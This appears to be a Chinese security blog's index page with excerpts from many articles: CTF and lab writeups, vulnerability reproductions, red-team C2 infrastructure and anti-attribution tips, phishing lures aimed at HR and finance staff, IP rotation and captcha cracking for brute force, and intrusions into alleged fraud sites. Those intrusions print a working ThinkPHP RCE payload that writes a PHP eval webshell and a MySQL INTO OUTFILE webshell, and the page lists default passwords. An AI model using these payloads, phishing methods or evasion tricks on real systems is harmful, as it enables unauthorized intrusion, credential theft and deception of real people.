红队攻击面相关讨论

MISC 签到题 八道网络安全选择题，百度都能搜索到答案，这里如果只知道部分题目答案，可以通过枚举测试fuzz答案，获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话，要求输入有六个参数并且第三个为gLIhR 的函数、被调用三次并且会调用到cHZv5op8rOmlAkb6的函数 Input the first function, which has 6 parameters and the third named gLIhR: 输入第一个函数，它有 6 个参数，第三个名为 gLIhR： Input the second function, which has 3 callers and invokes the function named cHZv5op8rOmlAkb6: 输入第二个函数，它有 3 个调用者并调用名为 cHZv5op8rOmlAkb6 的函数： 直接全局搜索，第一个函数为，ZlXDJkH3OZN4Mayd，有6个参数 第二个函数可以先全局搜索cHZv5op8rOmlAkb6 看哪个函数会调用到这个函数，然后再进一步搜索看看符不符合题意，相对应函数为UhnCm82SDGE0zLYO 有6个，出去自己，还有之后那个2个重复判断，则有3个调用 然后就是看主函数 func main() { var nFAzj, CuSkl string …

0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务，集群，Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。 0x01 漏洞环境 1.在ubuntu16.04下安装docker/docker-compose: # 安装pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装最新版docker curl -s https://get.docker.com/ | sh # 启动docker服务 service docker start # 安装compose pip install docker-compose # 下载项目 wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip unzip vulhub-master.zip cd vulhub-master # 进入某一个漏洞/环境的目录 cd activemq/CVE-2015-5254/ # 自动化编译环境 docker-compose build 2.运行漏洞环境： docke…

作为公司内部网络安全建设的基础环节，资产的收集以及对应的管理，尤其是漏洞管理，都是网络安全建设的基础。 资产收集第一步--已入网设备的收集： （1）收集手段：根据历史登记记录查询或者使用扫描方式对网络环境内部进行活跃主机探测。 （2）收集目标：覆盖所有已入网设备，包括云、IoT设备等，建立相应的库表结构存储，定期复测，有序更新。 资产收集第二步--新入网设备的收集： （1）收集手段：入网登记或者使用智能入网探测机制，可以利用网络探测技术，或者入网联通身份验证机制做收集。 （2）收集目标：覆盖所有新入网设备，包括云、IoT设备等，建立相应的库表结构存储，定期复测，有序更新。 资产收集第三步--虚拟资产的收集： （1）虚拟资产：包括但不限于重要数据记录、IP地址、MAC地址、主域名、子域名、CNAME记录、MX记录、NS记录、A记录等等。 （2）收集手段：登记审核机制以及扫描解析请求。 （3）收集目标：覆盖所有虚拟资产，建立相应的库表结构存储，定期复测，有序更新。 资产分析第一步--主机OS、SOFTWARE、SERVICES等信息收集： （1）技术手段：扫描 （2）收集信息：os系统信息（包含口令信息）、网络协议栈信息（MAC、IP、PORT、PROTOCOL、SERVICES）、软件信息（软件名称、版本） （3）收集目标：覆盖所有以上信息，并定期追踪探测，有序更新。 资产分析第二步--漏洞库建立： （1）收集方法：有条件的建立自己的SRC和漏洞平台，众测收集漏洞；自身，或邀请有资质的机构进行渗透测试，…

一、系统环境配置 系统环境：centos7x64 ip地址：172.16.91.130 1.设置静态IP地址 [root@localhost backlion]#vi /etc/sysconfig/network-scripts/ifcfg-* BOOTPROTO=static #dhcp改为static（修改） ONBOOT=yes #开机启用本配置，一般在最后一行（修改） IPADDR=172.16.91.130 #静态IP（增加） GATEWAY=172.168.91.1 #默认网关，虚拟机安装的话，通常是2，也就是VMnet8的网关设置（增加） NETMASK=255.255.255.0 #子网掩码（增加） DNS1=172.16.95.70 #DNS 配置，虚拟机安装的话，DNS就网关就行，多个DNS网址的话再增加（增加） [root@localhost ~]# /etc/init.d/network restart 设置DNS: Vim /etc/resolv.conf nameserver=114.114.114.114 nameserver=8.8.8.8 2.设置主机名 [root@localhost network-scripts]# hostnamectl set-hostname selks-server.com vim /etc/hosts最后加上你的IP与主机名的绑定 127.0.0.1 localhost localhost.localdomai…

0x00 漏洞描述Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。之前Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷，在1.5.3及其之前的版本，由于shiro在处理url时与spring仍然存在差异，依然存在身份校验绕过漏洞由于处理身份验证请求时出错，远程攻击者可以发送特制的HTTP请求，绕过身份验证过程并获得对应用程序的未授权访问。0x01 漏洞影响Apache Shiro < 1.6.00x02 环境搭建1.下载项目到本地https://github.com/l3yx/springboot-shiro2.将pom.xml中的1.5.2替换为1.5.3，将src/main/java/org/syclover/srpingbootshiroLoginController中的后台验证/admin/page替换为/admin/{name}3.通过IDEA编辑器重新build并运行即可，已编译好的war包将其放到tomcat下的webapps目录下运行即可https://github.com/backlion/demo/blob/master/srpingboot-shiro-0.0.1-SNAPSHOT.war0x03 代码说明1.ShiroConfig.java(pringboot-shiro-master\src\main\java\org\syclover\srpingbootshiro\ShiroConfig.java)权限配置， 当请求/…

0x00 红队基础知识一、构建一个大型内网域环境搭建父域控制器子域控制器辅域控制器域内主机域内服务器二、Windows NTLM（NT LAN Manager）认证原理Kerberos 域内认证原理0x02 内网信息搜集篇一、工作组和大型域内网如何进行信息搜集如何搜集本机密码 MySQLSQL Server... ...Linux 如何搜索特定的密码文件搜集指定用户的命令历史记录中的各种明文密码Windows 2012 高版本以上如何搜集密码 Windows 2012 版本以下如何搜集密码 关于 Linux 下如何搜集各种密码信息 无线密码抓取 组册表里各种健值敏感信息 搜集数据库中保存的各类高价值账号密码 搜集保存在目标系统本地各种文档中的明文密码 针对各类常用 windows 办公软件的各类密码搜集 如何搜集VPN密码 如何搜集浏览器相关凭证 Chrome 浏览器抓取凭证Firefox 浏览器抓取凭证360 浏览器抓取凭证IE 浏览器抓取凭证如何搜集各种数据库信息 通过 LDAP 定位核心机器通过 LDAP 获取内网架构分布通过 LDAP 获取内网组织架构通过 LDAP 获取域内核心机器Mysql SQL Server Oracle PostgreSQL LDAP 根据当前跳板机器搜集网络环境（判断那种协议出网） 获取当前系统的详细IP配置，包括所在域, ip, 掩码, 网关, 主备 dns ip 获取当前系统最近的用户登录记录 获取当前用户的所有命令历史记录（针对于 Linux） 远程截屏捕捉目标用户敏感操作 获取当前机器环境变量（…

0x00 前言第一部分是关于CobaltStrike优质文章的集合关于新特性BOF资源的整合解决要用的时候找不到合适aggressor script或者BOF的问题如果有本repo没有涉及的优质内容，欢迎大家提交pr0x01 相关文章合集 1. 基础知识参考 Cobalt_Strike_wikiCobaltStrike4.0笔记cobaltstrike4.1笔记CobaltStrike相关网络文章集合Cobalt Strike 外部 C2【一、原理篇】Cobalt Strike 桌面控制问题的解决（以及屏幕截图等后渗透工具）Cobalt Strike & MetaSploit 联动2. 破解以及定制参考 IntelliJ-IDEA修改cobaltstrikeCobaltStrike二次开发环境准备Cobal Strike 自定义OneLiner通过反射DLL注入来构建后渗透模块（第一课）Cobalt Strike Aggressor Script （第一课）Cobalt Strike Aggressor Script （第二课）3. 使用技巧参考 Cobalt Strike Spear Phishrun CS in win -- teamserver.batRemote NTLM relaying through CS -- related to CVE_2018_8581Cobalt Strike Convet VPN渗透神器CS3.14搭建使用及流量分析CobaltStrike生成免杀shellcodeCS-notes--一系…

0x00 前言之前在打一个域环境的时候出现了域内主机不出网的情况，当时用的是cs的socks代理将不出网主机的流量代理到了边缘主机上。当时没有考虑太多，下来之后想到搭一个环境复现一下当时的情况，看有没有更简便的方法能够打下不出网的主机。 机缘巧合之下，发现了这个域环境还不错，再复现的过程中也有一些知识触及了我的知识盲区，也收获了许多新的知识。特地把过程记录下来，与想要学习打域内不出网主机的师傅们共同分享。 0x01 靶场地址分配内网网段：192.168.52.0/24 外网网段：192.168.10.0/24 攻击机： kali：192.168.10.11 靶场： win7(内)：192.168.52.143 win7(外)：192.168.10.15 域内主机： Winserver2003：192.168.52.141 Winserver2008：192.168.52.138 其中win7可以外网、内网通信，域内主机只能内网之间进行通信 一开始DCping不通win7，win7关闭防火墙之后可以ping通 打开C盘下的phpstudy目录打开web服务 0x02 web服务器渗透nmap探测端口 开了80端口，尝试访问web地址，发现为php探针 滑到最底部，发现网站底部有一个MySQL数据库连接检测 弱口令root/root连接成功 扫描后台我这里用的是御剑，但是好像很拉，因为在我打完这个靶场之后再去网上看的时候发现他们很多扫出来一个cms，通过cms也能拿shell，这里我就不演示怎么用cms弱口令进后台写shell…

0x00 工具介绍 前言 BeRoot是一个后期开发工具，用于检查常见的Windows的配置错误，以方便找到提高我们提权的方法。其二进制编译地址为： https://github.com/AlessandroZ/BeRoot/releases 它将作为后开发模块被添加到pupy（Pupy是一个开源，跨平台（Windows，Linux，OSX，Android），多功能RAT远程管理工具和后开发工具，主要用python编写）项目中（因此它将在内存中执行，而不会在硬盘中执行）。 需要注意的是，这款工具只能用来检测，而无法直接利用目标系统中存在的漏洞。但是，如果它发现了错误配置，它可以通过模版来利用这些漏洞。模版文件位于templates/service目录下，如果项目提供的模版文件无法运行，我们也可以根据目标系统的情况手动创建一个模版文件。 工具下载 【beRoot.zip】（zip） 【源代码】（zip） 【源代码】（tar.gz） 工具运行： |============================================== | | | Windows Privilege Escalation | | …

情报收集与外网打点 因为起晚了..第一个议题没听着，有点遗憾，补张图 基础设施架构设计部署 普通架构：红队人员--》teamserver cs--》目标机 缺点：功能未分离、无潜伏通道、回连日志多、灵活性较低 演进架构：DNS/HTTP/HTTPS分离server tips：1~2cpu 2G内存 10G硬盘，回连数不超过5台，潜伏通道（根据实际目标环境优先） 完整架构： 域名和IP（VPS）teamserver（CS）前置机（redictor） CS -》teamservers 1/2/3/... 前置层（SMTP/PAYLOAD/C2/隐蔽C2） 选择域名 抢注过期域名 expireddomains.net DELETE DOMAIN tips1: 不要包含世界大厂和杀毒厂商相关的域名，以及和目标相关的域名 tips2：注册目标相关区域常见的域名，记得开隐私保护 其他：www.freshdrop.com www.domcop.com tips3：检查域名是否被分类，金融、医疗、电商、航空、旅游 great tips4：去VT、微步检查，域名是否被标黑 tips5：举报滥用规则仔细阅读（freenom 慎用） 培养域名（养号） 搭建正常域名，提交至各安全厂商给站点分类 tips1：把域名A记录解析到大厂ip，使用时候再解析到C2，不用时候解析回大厂ip tips2：VT 自评， alex 自评 域名解析检测 域名分类检测 domaincheck： IP检测 …

0x01 前言 去年年底，当设置一个模拟器来定位SMB协议时，发现了一个如此简单而又非常有效的攻击大型企业的漏洞。TL; DR：一个拒绝服务错误允许BSOD协议向Windows 8.1和Windows Server 2012 R2计算机发送单个数据包。 0x02 测试环境 受影响的系统： ·Windows 8.1（x86） ·Windows Server 2012 R2（x64） 0x03 背景知识 要了解此漏洞的根本原因，需要了解SMB数据包的结构方式。 让我们来看一下SMBv1协议头文件： 正如我们所看到的协议字段以FF字节开始,现在让我们来看看SMBv2 协议字段现在以FE字节开始,那么SMBv3呢？SMB协议的v3版本已经过加密，并将使用SMB2_Transform的特定头部进行加密通信： SMBv3 始终是加密的，正如可以在官方文档中了解到SMBv3会话的协商从SMBv2会话开始。以下是设置SMBv3会话时涉及到的数据包： 在1到8字节的数据包中，SMB数据头看起来像这样： 我们可以看到，使用的字节序列仍然是0xFE，它是Microsoft官方文档中指示的SMBv2的代码。 从第9字节开始，加密处于连通状态，并且报头中使用的字节序列将为0xFD 正如您在PoC中看到的那样，当第一次会话时立即发送带有0xFD报头的SMB数据包时会发生内核崩溃。现在，让我们深入了解崩溃转储机制，以了解此次崩溃的根本原因。 0x04 根本原因分析 仅在Windows 8.1（x86）上执行来…

0x01 外网打点资产发现多测绘平台搜索 https://hunter.qianxin.com/ https://fofa.info/ https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ，我们可以通过不同的语法进行资产搜集，搜集的资产会更全面 这里以fofa为例 domain="xxxx.com" host="xxxx.com" header="xxxx.com" cert="xxxx.com" 敏感信息泄露对于学校站点的信息搜集，一般来说外网能拿直接权限的点已经很少了，web应用大多是放在vpn后面，因此能弄到一个vpn账号可以说是事半功倍，这时候可以通过语法对此类信息进行挖掘 常用命令如下： #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里，也是幸运找到了某站点VPN的默认口令，使用的是 姓名拼音/12345678 弱口令 默认口令对于部分站点，在搭建完成后可能没有更改默认账号密码，这时候可以尝试使用默认账密登录 下面列举一些常见的web站点默认口令 账号： admin administrator root user test 密码： admin admin123 123456 123 test root 对于一些应用广泛的系统，可以通过google语法搜索其默认密码 这里通过sysadmin/1 成…

0 前言实战案例还原《BumbleBee Roasts Its Way To Domain Admin》一文详细的描述了一次渗透案例，但其文章组织架构建立在ATT&CK框架上，而不是按照时间线逻辑来组织，因此对于渗透人员了解学习其前后过程有些困难，特此梳理一番，按照时间线还原实战。 《BumbleBee Roasts Its Way To Domain Admin》原文链接 1 第一天（Day1）1.1 样本投递看起来是通过邮件中的下载链接投递到的目标环境中的机器，该样本是一个有密码的压缩包。解压缩后释放文件BC_invoice_Report_CORP_46.iso。当挂载这个ISO文件，会释放一个LNK文件documents.lnk，当双击这个快捷方式时会执行隐藏的恶意加载器。快捷方式的目标如下： 1.1.1 rundll32解析使用rundll32加载执行是常用渗透套路，可以执行dll中的程序，一般还可以用来获取shell： set srvhost 10.x.x.x exploit 1.2 加载恶意程序大黄蜂（BumbleBee）加载器大黄蜂（BumbleBee）返回Cobalt Strike Session，攻击者利用这个Cobalt Strike的shell释放wab.exe，该可执行文件将有wmi执行。 wab.exe将恶意代码注入到其他两个进程explorer.exe和rundll32.exe中。这里根据原文来看使用的是远线程注入，及使用经典的OpenProcess、VirtualAlloc、WriteProc…

利用Python脚本自动生成Clash配置文件，实现FUZZ自动切换IP。现在蓝狗封IP速度太快了，想想当年自己用Burp爆破封堵IP的日子就想哭。 不要问我为啥不用飞鱼，太贵了。0x00 购买IP地址池推荐余额套餐的方式进行购买，该脚本配合余额支付更划算。 http://http.py.cn/pay/?paytype=banlance 0x01 获取API接口购买套餐后，选择》API提取》直接提取，推荐配置如下： 1.余额提取。2.使用时长按需选择，建议选择25分钟-180分钟。3.提取数量建议为5-10，土豪随意。4.建议省份混拨，并选择自己所在省份或临近省份，提高访问速度。5.目前该代理协议仅支持SOKCS5连接。6.数据格式选择Json格式，方便脚本解析。7.选择属性全部勾选，否则会发生错误。8.IP去重365天。 0x02 部署说明将Auto_proxy代码（Auto_proxy_example.yaml, Auto_proxy.py, proxyIgnoreList.plist ）拷贝到Clash配置文件目录下。 Windows默认：Clash\Data\profiles\Mac默认：~/.config/clash/ 修改Auto_proxy.py相关配置，主要参数如下。 test_url：需要监控测试的IP地址。py_api：上一步获取的品易API接口。max_connect_error：错误连接次数，连续连接错误N次，重新获取代理。 白名单配置，可参考https://www.cnblogs.com/PowerTips/…

近期因为都懂的原因做了回蓝队，还偶尔客串了下和客户对接的角色，根据接触到的各家设备的特点写了一些总结。从红队的视觉下看如何防止被溯源。 ---8sec.cc 1、蜜罐系统浏览器使用注意单独隔离的浏览器 在渗透过程中尽量使用与常用浏览器不同的浏览器，如：Chrome常用，渗透使用firefox。 使用无痕模式 firefox和Chrome都有无痕模式，如果对目标资产不了解的情况下尽量开启无痕模式进行测试。 以上两种方式主要可以避免蜜罐中使用各大网站的Jsonp Callback、XSS等漏洞获取到红队人员的ID和信息。 但是蜜罐中使用的fingerprintjs库可以根据不同IP和不同浏览器的特定标识来判断来源访客是否是同一个人员，所以单独使用无痕模式和不同的浏览器也会导致被蜜罐识别。 反蜜罐插件bypass HoneypotAntiHoneypot - 一个拦截蜜罐XSSI的Chrome扩展 功能截获页面中发起的XSSI请求，通过特征识别阻断可疑的XSSI（Jsonp Callback、XSS等）分析和攫取蜜罐固有特征，识别蜜罐并拦截所有请求判断fingerprintjs库是否存在并提示，判断是否有其他web指纹的相关调用判断是否有持久化身份标识的相关调用判断页面中是否对剪贴板的粘贴进行了取值（待进一步验证）一键清除当前网站的所有浏览器数据功能（包括所有缓存的、存储的）判断页面中是否操作了FileSystem（可以把evercookie写到这里）2、防止反制服务器跳板机 根据各家溯源获取信息量排除蜜罐因素也有一部分的原因是VPS被打…

拿到目标站这个页面 还没开始就已经准备放弃 然后咱看右上角有个积分商城,心如死灰的我点进去 看到这个页面直接摔门出去抽烟十分钟[别问为什么一问就是之前没搞成 开始信息收集吧 拿到这个积分商城把域名放进fofa 得到真实ip以后找到了宝塔后台登录面板 然后用域名/ip对目录进行扫描[御剑超大字典那款]看着语言栏勾选啊，还不知道啥脚本语言域名后面直接跟上index.php[有页面]、index.jsp[404]、index.asp[404]好嘞勾上php得到后台 像这样的页面源码很少的就碰运气找特征来试 在fofa中搜索 很多页面都是显示onethink,然后放百度搜一下 确定了是这个框架并且是基于thinkphp开发的[这里有个思路:当我们用tp框架漏洞去打的时候如果不成功,那么我们就可以利用找到的cms进行代码审计,基于我们上面已经找到了宝塔登录面板那么我们可以审计任意文件读取得到宝塔用户名密码,计划任务getshell]利用tp漏洞扫描工具获得POC debug报错出来是tp5.0.1搜了一下找到了日志路径尝试利用日志包含一直没成功后来发现他的日志到了一定的数量就会清空且phpinfo页面会占有一定的kb所以要通过burp让他的日志清空再进行包含把url编码抓包给转换成<?php phpinfo();?> //具体原因见[漏洞汇总 文件包含] 发送send时日志文件在burp里面没显示完马上就没有了此时再回头看最初POC当POC成功的时候下面会有debug信息 所以我们把注意力放在Raw当执行成功时会…

一、使用reCAPTCHA插件进行验证码爆破 插件下载地址：https://github.com/bit4woo/reCAPTCHA/releases 1.浏览器输入网站登录页面，输入用户名和密码以及验证码，然后通过buspuit获取数据包 2.然后点击验证码获取验证码的地址，在proxy中找到获取图形验证码的请求，选中它并点击右键选择“Send to reCAPTCHA”，这个请求的信息将被发送到reCAPTCHA。 3.切换到reCAPTCHA标签，并配置所需的参数。当参数配置好后，你可以点击“请求”按钮来测试配置 这里需要注意的是，需要到https://www.jsdati.com/注册一个打码平台，然后购买点数，这里可以用1元购买测试。 username=xxx&password=xxxx&captchaType=1008. 这里的username是你注册的账号，password你注册账号的密码，aptchaType为你识别的验证码类型，该类型可以通过下面链接地址查询到 https://www.jsdati.com/docs/price 4.完成了配置并测试成功后，现在可以在Intruder中使用该插件生成的payload了。 有2种情况：用户名或密码之一+验证码；用户名+密码+验证码； 情况一：只有密码或只有用户名需要改变，我们可以用Pitchfork 模式来配置。 比如，已知系统存在一个用户admin，来爆破该用户，插入点标记如下， payl…

最近偶然发现一个虚拟货币买涨跌的杀猪盘，遂进行了一波测试，前台长这样。 为thinkphp5.0.5随用RCE进行打入，成功写入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7)) 查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数，且com和dl加载都不能用无法执行相应的系统命令如下所示： assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open //php如上系统命令都已禁用 但有文件的读写权限没有禁用assert()，file_put_contents()等函数，查看后发现为windows系统如下所示： 由于php执行系统命令的函数都被禁用了，从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波，发现其管理员cookie固定且可以伪造如下所示看着像后门： 故可后台登录绕过，管理员cookie固定，添加cookie字段即可登录绕过。浏览器f12，在cookie中添加上述键值访问index，即可成功后台登录如下所示好多钱(被骗的人好多)： 前台询问客…

0x00前言 本来开学正忙于实现电竞梦（联盟高校联赛），某一天下午突然有位师傅联系我说可以免面试进组打省护红队，这么好的实战机会怎么能错过呢～（好好玩游戏，不要学我^^） 0x01 一个出局的企业单位内网之旅 打点一 故事的开始是某佬丢了一个系统nday shell给我 ipconfig发现有10段内网，这种网段内网一般都很大 但是这种nday已经被别人扫烂了 目录全是马 发现不对劲，这是什么？！ 哪位不知名黑客昨天传的fscan 但是目标单位还没出局 先打再说 准备cs上线 但是发现不出网 先在哥斯拉传fcsan命令执行扫了一下b段 (应该先noping稍微扫一下c段再拿一台机器留后路在搞，这次做的有问题，不然流量检测设备检测到了，然后关站就直接寄了) 一堆弱口令➕redis Neo-reGeorg使用 使用Neo-reGeorg正向隧道工具把流量代理出来： Neo-reGeorg是常见的http正向隧道工具，是reGeorg的升级版，增加了内容加密、请求头定制、响应码定制等等一些特性 python3 neoreg.py generate -k xxx --file 404.html --httpcode 404 生成一个webshell密码为xxx 比较有意思的是，工具新增的404模版功能，实战copy目标站点的404html，给到工具之后生成的webshell直接访问是404，对文件隐藏有很好的帮助 上传至目标站点 python3 neoreg.py -k…

0X00 事情由来 了解完事情的经过，经过我的经验判断，这应该是个杀猪诈骗案例 诈骗份子通过一些手段让受害人相信，通过他们可以赚钱并诱导充值杀猪盘赌博 0X01 渗透过程-大概二十分钟左右就拿下了渗透过程简单枯燥： 看了一眼IP和端口，判断了下应该不存在云waf，直接开始扫目录 过了几分钟扫到一个http://xxxx.com.cn/u.php，原来是upupw的集成环境，如下图 思路，爆破phpmyadmin，或者找upupw的默认数据库密码，先找默认密码试试看 成功用系统提供的密码登录，默认的是：DRsXT5ZJ6Oi55LPQ成功登录phpmyadmin 然后尝试getshell，由于有upupw探针，直接查看了phpinfo，有网站的绝对路径，直接尝试常规写shell 需要知道绝对路径、数据库root权限、数据库有写权限具体语句：SELECT "<?php eval(@$_POST['xx']);?>" INTO OUTFILE "D:\\wap\\member_bak.php"注意点：windows下，须要双反斜线，否则会转义然后使用菜刀/蚁剑等链接即可由于当时没有截图，目前网站已经打不开了，所以下面就直接放出拿到shell后的状态了 渗透结束，看了下权限，是system权限，不过咱们的目标是定位诈骗分子的IP信息和位置信息，接着下一步了 0X02 定位诈骗份子的IP和端口拿到shell了就容易的多了，找后台登录的php文件插入xss代码即可 找了一圈发现，后台登录是另外一个网站…

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼文案…

0x00 前言在内网渗透的过程中思路才是最重要的，本次内网渗透的主机虽然不多，主要还是锻炼自己内网渗透的一个思想。 0x01 环境搭建靶场： win7(内)：192.168.138.136 win7(外)：192.168.10.25 域内主机： win2008：192.168.138.138 0x03 web服务器渗透nmap探测端口nmap -T4 -sC -sV 192.168.10.25 这里可以看到几个主要的端口，例如80、135、139、445，这里首先就可以想到可以利用的点有ipc、smb 开了80端口，尝试访问web地址，老笑脸人了，而且还是5.x版本，洞还是比较多 为了确定具体版本，这里先使用报错查看，发现这里的版本为5.0.22，如果没记错的话这里是有一个tp远程命令执行漏洞的 thinkphp getshell这里我首先在kali里面找一下有没有相关的漏洞 searchsploit thinkphp 可以看到这里有一个5.x远程执行漏洞，这里直接进入这个文件夹查看一下txt列出来的payload cd /usr/share/exploitdb/exploits/php/webapps cat 46150.txt 找到对应版本后fuzz以下payload，这个是列出数据库名字，这里看到数据库名为root 192.168.10.25/thinkphp/public/?s=.|think\config/get&name=database.username 这个payload应该是列出数据库密码，但是这里…

你可能看着他想python脚本,但其实他是sage脚本 什么是sage? 维基百科: 我们经常会遇到一些脚本并不能再python运行,其实那是sage脚本 我们可以去现在一个sagemath,在上面运行就好了 在线运行 windows下载 下载.exe就行,安装时间有点长 第一个让选择的目录是用于存放sage文件的(建议新建一个空目录) 第二个是软件的安装目录 sagemath会在桌面上生成三个快捷方式note是他的网页版,点开后自动在浏览器上加载出来 shell是命令行 console是一个很好的交互式shell 在sage网页上面可以新建一个sagemath文件,在里面就可以运行了 sage导入python库 但对于一些crypto脚本经常还要导入一些python库 倒腾很久都弄不好,一直运行不了真让人烦 我们讲一下如何在windows上导入python库 手动添加python库 安装目录\SageMath 9.3\runtime\opt\sagemath-9.3\local\lib\python3.7\site-packages 直接把包粘贴在里面(这里就是他的第三方库的文件夹) 在shell 中输入想要的包 pip install pycryptodeme 用文件运行 !pip install pycryptodeme 现在你就可以运行你的代码了 如果你明明已经配置好了第三方库但是他们…

网上大多数的小程序测试抓包都是用的安卓模拟器，这里使用的是BurpSuite+Proxifer+微信客户端的抓包方式 环境准备 Burp2023.9.2 Proxifier4.5 Proxifier是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器，工作的网络程序能通过HTTPS或socks或代理链。其是收费软件，免费试用31天，这里给一个破解版链接 链接：https://pan.baidu.com/s/14QElyGxDpMBGTuCFTPl4tQ?pwd=7o50 提取码：7o50 安装就无脑next就好了，安装好后打开 点击注册，名字随便写，随便复制一个注册码点击ok即可 Proxifier配置 打开proxifier，点击profile添加一个代理服务器 地址127.0.0.1，端口自定义，我这里是8888，协议选择https 继续添加一条代理规则 在我们用微信打开小程序时，进程里会多出一个WeChatAppEx 这个程序就是微信小程序的进程 添加规则 Applications就选择小程序进程应用（这里可以手动输入），Action就选择刚刚新建的代理服务器 Burp配置 只要编辑代理监听器和proxifier里的代理服务器一样即可，监听127.0.0.1:8888 这时微信打开一个小程序，可以看到WeChatAppEx的流量先经过proxifier，再用过127.0.0.1:8888到burp 现在就可以像平时测试web站点一样的方式在burp里对…

前言 29号开始的 31号域开始打,打了一天到2月1 WEEK1就卡瓶颈了 整个参赛人数接近2千,写笔记记录一下一些脚本和解题思路 注:本文章在比赛结束前已开启文章密码保护,未泄露解题思路,比赛结束后正式开放文章 ->Web方向 冲 Bypass it 点击注册 尝试burpsuite爆破无果,题目说不让禁用js 但那是迷惑人的,最后禁用js就可以注册成功 禁用后注册即可 注册成功直接登录就能拿到flag ez http 打开后发现需要添加refrer头跟进访问此网站 Burpsuite开盒即用中文版： 最新BurpSuite2023专业汉化版下载（无需任何配置） 2年前29106110 抓包发送到重放器里面,且添加头部文件 让后这里说需要添加ua标识 直接复制在改上去 有实战渗透的的操作了(出的题就是好!,因为一些学校的edu还有公司网站的后…